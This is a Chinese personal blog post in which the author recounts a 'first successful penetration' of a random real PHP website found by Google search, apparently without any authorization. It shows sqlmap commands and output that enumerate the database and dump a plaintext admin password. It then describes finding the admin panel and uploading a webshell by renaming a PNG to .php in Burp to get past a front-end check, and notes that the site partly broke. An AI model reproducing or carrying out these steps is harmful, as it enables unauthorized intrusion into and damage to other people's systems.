记第一次渗透成功

昨天晚上玩了玩CTF，感觉对于自己sql注入还得再熟悉一下，下了一些SQL注入的书看。
一边看一边觉得该实践一下，就谷歌搜索了php网站，第一个网站点进去开始测试书上的方法，没想到居然能注入。
觉得这个网站可能渗透成功，用sqlmap开始注入
搜集到一些信息，应该是个很老的网站了，不然也不会这么容易注入。。网站有的页面还能找到类似“请管理员及时修复漏洞”这样的话，哈哈。感觉也是个找网站的思路。

[23:40:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 4.9
web application technology: PHP 4.3.9, Apache 2.0.52, Plesk
back-end DBMS: MySQL >= 4.1

一会儿就把数据库名爆出来了

$sqlmap -u 'your/url' --dbs
[23:41:44] [INFO] fetching current database
available databases [1]:
[*] workshop

接着爆表名，但是爆不出来，只好手动去猜：

$sqlmap -u 'your/url' -D workshop --tables
Database: workshop
[3 tables]
+-------+
| admin |
| book  |
| news  |
+-------+

接着看列名，同样爆不出来，手动去猜：

$sqlmap -u 'your/url' -D workshop -T admin --columns
Database: workshop
Table: admin
[2 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| admin  | non-numeric |
| pwd    | numeric     |
+--------+-------------+

看密码，密码居然是明文的！

$sqlmap -u 'your/url' -D workshop -T admin --dump
Database: workshop                                                                                   
Table: admin
[3 entries]
+----------+---------------+
| pwd      | admin         |
+----------+---------------+
| 1234     | 123           |
+----------+---------------+

然后纠结半天，因为没什么经验，找了一圈找不到后台。我想要不连上数据库然后写webshell，研究了半天，也没连上数据库，3306端口没开放，不知道怎么连数据库。后来网上下了个后台扫描工具，一扫就把后台扫出来了，果然强大。
连上后台，看了一圈，只有个上传图片的地方，有个图片的链接上面写着xx.php，明显已经有人上传过木马了。
于是开始上传webshell（正好昨天刚了解了webshell是什么）
因为前端js有验证上传文件必须是图片格式的步骤，直接上传php文件不行，我改了半天js还是不行，应该是js的事件在浏览器注册过了之后你再删除js脚本也没用。于是直接上传yy.png的webshell，用burp抓包修改成yy.php。
上传成功，菜刀成功连接。

至此渗透成功。
只是在我的webshell上传之后，网页有一部分崩溃了不显示了。应该是由于某些错误。。还不清楚。

参考：
一起学安全测试——用sqlmap对dvwa实现SQL注入测试
sqlmap拖库
浅谈后台扫描的几种方法
绕过图片格式限制上传木马获取WebShell